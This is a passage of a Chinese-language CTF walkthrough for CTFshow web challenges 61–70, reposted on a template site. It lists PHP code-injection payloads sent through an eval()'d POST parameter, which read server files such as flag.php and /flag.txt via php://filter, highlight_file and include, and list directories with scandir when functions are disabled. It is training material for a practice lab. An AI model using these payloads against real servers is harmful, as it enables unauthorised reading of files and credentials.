ctf - web入门
索引
- web61~70:post 请求之 eval() 利用。
web61~65
题解
这几个题都和 web58 一样。可能内部禁用的函数不一样吧。但 payload 都差不多。不多解释了。
以下解法随便挑一个即可。可能不同题会有部分函数被禁。
payload1:
c=include "php://filter/read=convert.base64-encode/resource=flag.php";
payload2:
c=show_source('flag.php');
payload3:
c=file_get_contents('flag.php');
payload4:
c=highlight_file("flag.php");
web66
题解
题目没变化。
随便试一个函数。
根据提示,先扫一下根目录。
c=print_r(scandir('/'));
可得 payload:
c=highlight_file("/flag.txt");
原理
PHP 中:
- scandir():扫描目录。
web67
题解
题目就不贴了。和前几题一模一样的。
区别在于,print_r()
函数被禁了。
那就用 var_dump()
函数。
c=var_dump(scandir('/'));
payload:
c=highlight_file("/flag.txt");
原理
- var_dump():打印变量的相关信息
web68
题解
一上来就说 highlight_file() 函数被禁了。
先尝试扫一下根目录。
c=var_dump(scandir('/'));
那就使用 include() 函数将文件内容包含进来。
payload:
c=include("/flag.txt");
原理
- include():表达式包含并运行指定文件。
web69
题解
题目与 web68 一样。
但是 var_dump() 被禁了。
换一个函数即可。
c=var_export(scandir("/"));
payload:
c=include("/flag.txt");
原理
- var_export:输出或返回变量的可解析字符串表示。
web70
题解
看题,禁用了一堆函数。
但其实沿用 web69 的方法即可。
c=var_export(scandir("/"));
c=include("/flag.txt");
原理
- error_reporting():设置应该报告何种 PHP 错误。
- ini_set():配置选项设置值。
对这题来说没啥用的函数。
一笑出门去,千里落花风。 文章来源:https://www.toymoban.com/news/detail-429990.html
——《水调歌头 · 我饮不须劝》(宋)辛弃疾 文章来源地址https://www.toymoban.com/news/detail-429990.html
到了这里,关于《CTFshow-Web入门》07. Web 61~70的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!